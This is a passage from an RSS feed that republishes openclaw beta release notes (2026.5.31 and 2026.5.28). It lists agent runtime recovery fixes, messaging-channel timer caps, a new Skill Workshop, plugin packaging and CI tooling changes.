<li>Agents/Codex: keep live session locks during cleanup, recover interrupted CLI tool transcripts, preserve Codex auth and compaction session identity, clear orphan tool state, cap app-server idle timers, and keep media completion delivery retryable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Chat/UI: show Gateway chat failures as visible assistant messages in the Control UI instead of only setting an invisible error state.</li>
<li>Channels: cap Telegram, Discord, WhatsApp, Signal, Feishu, Google Chat, Microsoft Teams, QQBot, Nostr, Zalo, Zalouser, and Nextcloud-style request/retry timers; preserve SMS approval reply routes; and retry WhatsApp QR login 408 timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>)</li>
<li>Security/config parsing: reject unsafe OAuth/token lifetimes, retry-after delays, inbound timestamps, response body sizes, command timeout config, sandbox observer token TTLs, and gateway WebSocket calls after close.</li>
<li>Providers/media: cap local service, model, usage, queue, generated media, TTS, music, workflow polling, and provider OAuth request timers across hosted and local providers.</li>
<li>Release/CI/E2E: bound release candidate reads, beta smoke REST calls, changelog restore, kitchen-sink and bundled plugin readiness probes, secret-provider probes, Vitest routing, and mainline test flakes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551354671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88127" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88127/hovercard" href="https://github.com/openclaw/openclaw/pull/88127">#88127</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551653681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88137" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88137/hovercard" href="https://github.com/openclaw/openclaw/pull/88137">#88137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552032597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88155" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88155/hovercard" href="https://github.com/openclaw/openclaw/pull/88155">#88155</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552192113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88160/hovercard" href="https://github.com/openclaw/openclaw/pull/88160">#88160</a>)</li>
<li>Release/CI/E2E: run the secret-provider integration proof through the repo pnpm runner so native macOS and Windows validation use the hydrated package-manager shim.</li>
<li>Release/CI/E2E: run the Telegram desktop proof gateway through the repo pnpm runner so native macOS proof uses the hydrated package-manager shim.</li>
<li>Docs/CI: run Mintlify anchor checks through the repo pnpm runner so docs link validation works when pnpm is only available through the hydrated package-manager shim.</li>
<li>Agents: keep configured fallback model metadata typed so provider params, context-token caps, and media input limits do not break changed-gate typechecks.</li>
<li>Agents: accept hidden <code>sessions_send</code> body aliases before validation while keeping the model-facing <code>message</code> schema canonical. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553200827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88229" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88229/hovercard" href="https://github.com/openclaw/openclaw/pull/88229">#88229</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>CI/Crabbox: keep default runner capacity spot-only and provider-neutral so OpenClaw remote validation does not silently fall back to on-demand leases or stale AWS region hints.</li>
<li>CI/Crabbox: route Crabbox wrapper and Testbox workflow edits to their regression tests so changed-test gates do not silently run zero specs.</li>
<li>CI/workflows: route workflow sanity helper edits to their guard tests and cover composite-action input interpolation checks.</li>
<li>CI/tooling: route CI scope, dependency, changelog, and docs helper edits to their owner tests instead of silently skipping changed-test coverage.</li>
<li>CI/tooling: route package, release, and install helper edits to their owner tests so changed-test gates cover publish and installer script changes.</li>
<li>CI/tooling: route shared script library edits through their owner tests so lock, process, safety, and scan helpers do not skip changed-test coverage.</li>
<li>CI/tooling: skip expensive import-graph scans once a changed diff already requires broad fallback, keeping local changed-test planning fast while still collecting explicit owner tests.</li>
<li>CI/tooling: route script edits through conventional owner tests when matching <code>test/scripts</code> or <code>src/scripts</code> coverage already exists.</li>
<li>CI/tooling: honor option terminators in the memory FD repro script so follow-on arguments are not reparsed.</li>
<li>Release/CI/E2E: assert plugin lifecycle runtime inspect output instead of only capturing it.</li>
<li>Release/CI/E2E: make gateway-network prove the advertised health RPC and retry early WebSocket closes without burning full open timeouts.</li>
<li>Release/CI/E2E: honor option terminators across release, Parallels smoke, plugin gauntlet, and extension-memory scripts.</li>
<li>Release/CI/E2E: fail plugin gateway gauntlet QA chunks when the requested suite summary is missing or invalid.</li>
<li>Performance: prebuild QA runtime probes with generated plugin assets but without CLI startup metadata.</li>
<li>Performance: skip declaration bundling for runtime-only CLI startup and gateway watch build profiles.</li>
<li>Performance: reuse prepared provider handles, strict tool schemas, gateway runtime metadata, session maintenance config, plugin metadata, bundled skill allowlists, package-local plugin artifacts, single-entry store writes, and validated/serialized session prompt blobs.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.31-beta.1]]></title>
<description><![CDATA[2026.5.31
Highlights

Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (#88129, #88136, #88141, #88162, #88182)
Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, S...]]></description>
<link>https://tsecurity.de/de/3561202/downloads/openclaw-2026531-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561202/downloads/openclaw-2026531-beta1/</guid>
<pubDate>Sun, 31 May 2026 19:46:33 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.31</h2>
<h3>Highlights</h3>
<ul>
<li>Agents and CLI-backed runtimes recover more cleanly from interrupted tool calls, stale session bindings, compaction handoffs, and media delivery retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Channels and mobile delivery are steadier across Telegram, WhatsApp, iMessage, Slack, Discord, Microsoft Teams, Google Chat, Google Meet, and iOS realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>Provider and plugin requests now bound more timers, retries, OAuth/device-code lifetimes, media downloads, local service probes, and generated-content polling paths before they can hang a run.</li>
<li>Skills, session metadata, gateway runtime state, plugin metadata, and store writes do less repeated work on hot paths while keeping config and dispatch behavior stable.</li>
<li>Workboard, SecretRef plugin manifests, hosted iOS push relay, and external Copilot/Tokenjuice packaging add broader orchestration, integration, and plugin delivery surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544177368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87796" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87796/hovercard" href="https://github.com/openclaw/openclaw/pull/87796">#87796</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550878888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88107" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88107/hovercard" href="https://github.com/openclaw/openclaw/pull/88107">#88107</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Release, CI, Docker, E2E, and diagnostics lanes now cap more logs, response bodies, readiness probes, artifact checks, and status polling so failures report bounded proof instead of stalling.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Docs: add a dedicated Skill Workshop guide covering governed skill creation, reviewable proposals, CLI, Gateway, agent tool behavior, approval policy, support files, and recovery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let the <code>skill_workshop</code> agent tool apply, reject, and quarantine explicit proposals through the guarded review flow. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let proposals carry approved support files under standard skill folders, with scanner, hash, and rollback safeguards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: let pending proposals be revised in place with versioned, dated proposal frontmatter before approval. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Skills: add Skill Workshop with pending proposals, CLI/Gateway review actions, rollback metadata, and the <code>skill_workshop</code> agent tool. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins: externalize Tokenjuice as the official <code>@openclaw/tokenjuice</code> plugin with npm and ClawHub publish metadata.</li>
<li>Plugins: externalize the GitHub Copilot agent runtime as the official <code>@openclaw/copilot</code> plugin with npm and ClawHub publish metadata.</li>
<li>iOS: add hosted push relay defaults, realtime Talk playback, and a guarded WebSocket ping path for more reliable mobile sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550652541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88096/hovercard" href="https://github.com/openclaw/openclaw/pull/88096">#88096</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550870064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88105/hovercard" href="https://github.com/openclaw/openclaw/pull/88105">#88105</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553214878" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88231/hovercard" href="https://github.com/openclaw/openclaw/pull/88231">#88231</a>)</li>
<li>Workboard: add orchestration primitives and agent coordination tools for multi-agent planning and run tracking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536829250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87469/hovercard" href="https://github.com/openclaw/openclaw/pull/87469">#87469</a>)</li>
<li>Code mode: add internal namespaces for scoped agent/global sessions and exact namespace tool dispatch. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549263089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88043/hovercard" href="https://github.com/openclaw/openclaw/pull/88043">#88043</a>)</li>
<li>Control UI: add a Dreaming-tab agent selector and propagate the selected agent through Dreaming status, diary, and diary actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4395906736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78748/hovercard" href="https://github.com/openclaw/openclaw/pull/78748">#78748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stevenepalmer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stevenepalmer">@stevenepalmer</a>.</li>
<li>Plugins: add a SecretRef provider integration manifest contract and extract shared LLM core packages for provider/plugin reuse. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456977405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82326" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82326/hovercard" href="https://github.com/openclaw/openclaw/pull/82326">#82326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551059990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88117/hovercard" href="https://github.com/openclaw/openclaw/pull/88117">#88117</a>)</li>
<li>Skills: add the core skills index and centralize skills runtime loading, status, filtering, and prompt formatting.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/media: keep async image, music, and video generation starts from ending the Codex turn, so mixed requests can continue with summaries or other work while media renders in the background.</li>
<li>Agents/Codex: keep public OpenAI API-key profiles from being treated as native Codex app-server auth while preserving persisted Codex OAuth sessions.</li>
<li>Control UI: keep collapsed tool cards labeled with the tool name and action instead of generic output text. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Codex: surface Skill Workshop guidance in Codex app-server prompts when <code>skill_workshop</code> is available. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI: keep <code>plugins list --json</code> on the snapshot-only path so plugin sweeps avoid loading the full runtime status graph.</li>
<li>Plugins: make PixVerse external-plugin ClawHub metadata explicit and keep it out of bundled dist builds.</li>
<li>Cron: keep SQLite cron migrations compatible with legacy run-log tables, archived job stores, diagnostic cron names, and legacy one-shot delete-after-run behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4554018071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88285/hovercard" href="https://github.com/openclaw/openclaw/pull/88285">#88285</a>)</li>
<li>Providers: bound generated media downloads from OpenAI, Runway, xAI, MiniMax, BytePlus, DashScope-compatible, FAL, OpenRouter, Google, Vydra, and Comfy providers.</li>
<li>Providers: cap GitHub Copilot OAuth request timeouts before creating abort signals.</li>
<li>Cron: retry recurring jobs after transient model rate limits before waiting for the next scheduled slot.</li>
<li>Agents/Codex: keep live session locks during cleanup, recover interrupted CLI tool transcripts, preserve Codex auth and compaction session identity, clear orphan tool state, cap app-server idle timers, and keep media completion delivery retryable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551374072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88129" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88129/hovercard" href="https://github.com/openclaw/openclaw/pull/88129">#88129</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551617563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88136/hovercard" href="https://github.com/openclaw/openclaw/pull/88136">#88136</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551806062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88141" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88141/hovercard" href="https://github.com/openclaw/openclaw/pull/88141">#88141</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552232095" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88162/hovercard" href="https://github.com/openclaw/openclaw/pull/88162">#88162</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552583855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88182/hovercard" href="https://github.com/openclaw/openclaw/pull/88182">#88182</a>)</li>
<li>Chat/UI: show Gateway chat failures as visible assistant messages in the Control UI instead of only setting an invisible error state.</li>
<li>Channels: cap Telegram, Discord, WhatsApp, Signal, Feishu, Google Chat, Microsoft Teams, QQBot, Nostr, Zalo, Zalouser, and Nextcloud-style request/retry timers; preserve SMS approval reply routes; and retry WhatsApp QR login 408 timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552604231" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88183/hovercard" href="https://github.com/openclaw/openclaw/pull/88183">#88183</a>)</li>
<li>Security/config parsing: reject unsafe OAuth/token lifetimes, retry-after delays, inbound timestamps, response body sizes, command timeout config, sandbox observer token TTLs, and gateway WebSocket calls after close.</li>
<li>Providers/media: cap local service, model, usage, queue, generated media, TTS, music, workflow polling, and provider OAuth request timers across hosted and local providers.</li>
<li>Release/CI/E2E: bound release candidate reads, beta smoke REST calls, changelog restore, kitchen-sink and bundled plugin readiness probes, secret-provider probes, Vitest routing, and mainline test flakes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551354671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88127" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88127/hovercard" href="https://github.com/openclaw/openclaw/pull/88127">#88127</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551653681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88137" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88137/hovercard" href="https://github.com/openclaw/openclaw/pull/88137">#88137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552032597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88155" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88155/hovercard" href="https://github.com/openclaw/openclaw/pull/88155">#88155</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4552192113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88160/hovercard" href="https://github.com/openclaw/openclaw/pull/88160">#88160</a>)</li>
<li>Release/CI/E2E: run the secret-provider integration proof through the repo pnpm runner so native macOS and Windows validation use the hydrated package-manager shim.</li>
<li>Release/CI/E2E: run the Telegram desktop proof gateway through the repo pnpm runner so native macOS proof uses the hydrated package-manager shim.</li>
<li>Docs/CI: run Mintlify anchor checks through the repo pnpm runner so docs link validation works when pnpm is only available through the hydrated package-manager shim.</li>
<li>Agents: keep configured fallback model metadata typed so provider params, context-token caps, and media input limits do not break changed-gate typechecks.</li>
<li>Agents: accept hidden <code>sessions_send</code> body aliases before validation while keeping the model-facing <code>message</code> schema canonical. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4553200827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/88229" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/88229/hovercard" href="https://github.com/openclaw/openclaw/pull/88229">#88229</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>CI/Crabbox: keep default runner capacity spot-only and provider-neutral so OpenClaw remote validation does not silently fall back to on-demand leases or stale AWS region hints.</li>
<li>CI/Crabbox: route Crabbox wrapper and Testbox workflow edits to their regression tests so changed-test gates do not silently run zero specs.</li>
<li>CI/workflows: route workflow sanity helper edits to their guard tests and cover composite-action input interpolation checks.</li>
<li>CI/tooling: route CI scope, dependency, changelog, and docs helper edits to their owner tests instead of silently skipping changed-test coverage.</li>
<li>CI/tooling: route package, release, and install helper edits to their owner tests so changed-test gates cover publish and installer script changes.</li>
<li>CI/tooling: route shared script library edits through their owner tests so lock, process, safety, and scan helpers do not skip changed-test coverage.</li>
<li>CI/tooling: skip expensive import-graph scans once a changed diff already requires broad fallback, keeping local changed-test planning fast while still collecting explicit owner tests.</li>
<li>CI/tooling: route script edits through conventional owner tests when matching <code>test/scripts</code> or <code>src/scripts</code> coverage already exists.</li>
<li>CI/tooling: honor option terminators in the memory FD repro script so follow-on arguments are not reparsed.</li>
<li>Release/CI/E2E: assert plugin lifecycle runtime inspect output instead of only capturing it.</li>
<li>Release/CI/E2E: make gateway-network prove the advertised health RPC and retry early WebSocket closes without burning full open timeouts.</li>
<li>Release/CI/E2E: honor option terminators across release, Parallels smoke, plugin gauntlet, and extension-memory scripts.</li>
<li>Release/CI/E2E: fail plugin gateway gauntlet QA chunks when the requested suite summary is missing or invalid.</li>
<li>Performance: prebuild QA runtime probes with generated plugin assets but without CLI startup metadata.</li>
<li>Performance: skip declaration bundling for runtime-only CLI startup and gateway watch build profiles.</li>
<li>Performance: reuse prepared provider handles, strict tool schemas, gateway runtime metadata, session maintenance config, plugin metadata, bundled skill allowlists, package-local plugin artifacts, single-entry store writes, and validated/serialized session prompt blobs.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.28-beta.2]]></title>
<description><![CDATA[2026.5.28
Highlights

Agent and Codex runtime recovery is steadier: subagents keep cwd/workspace separation, hook context stays prompt-local, session locks release on timeout abort, stale restart continuations are avoided, and Codex app-server/helper failures no longer tear down shared runtime st...]]></description>
<link>https://tsecurity.de/de/3556921/downloads/openclaw-2026528-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556921/downloads/openclaw-2026528-beta2/</guid>
<pubDate>Fri, 29 May 2026 14:31:29 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.28</h2>
<h3>Highlights</h3>
<ul>
<li>Agent and Codex runtime recovery is steadier: subagents keep cwd/workspace separation, hook context stays prompt-local, session locks release on timeout abort, stale restart continuations are avoided, and Codex app-server/helper failures no longer tear down shared runtime state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4530733870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87218/hovercard" href="https://github.com/openclaw/openclaw/pull/87218">#87218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523882966" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86875" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86875/hovercard" href="https://github.com/openclaw/openclaw/pull/86875">#86875</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535658120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87409" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87409/hovercard" href="https://github.com/openclaw/openclaw/pull/87409">#87409</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535300059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87399" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87399/hovercard" href="https://github.com/openclaw/openclaw/pull/87399">#87399</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534684461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87375/hovercard" href="https://github.com/openclaw/openclaw/pull/87375">#87375</a>)</li>
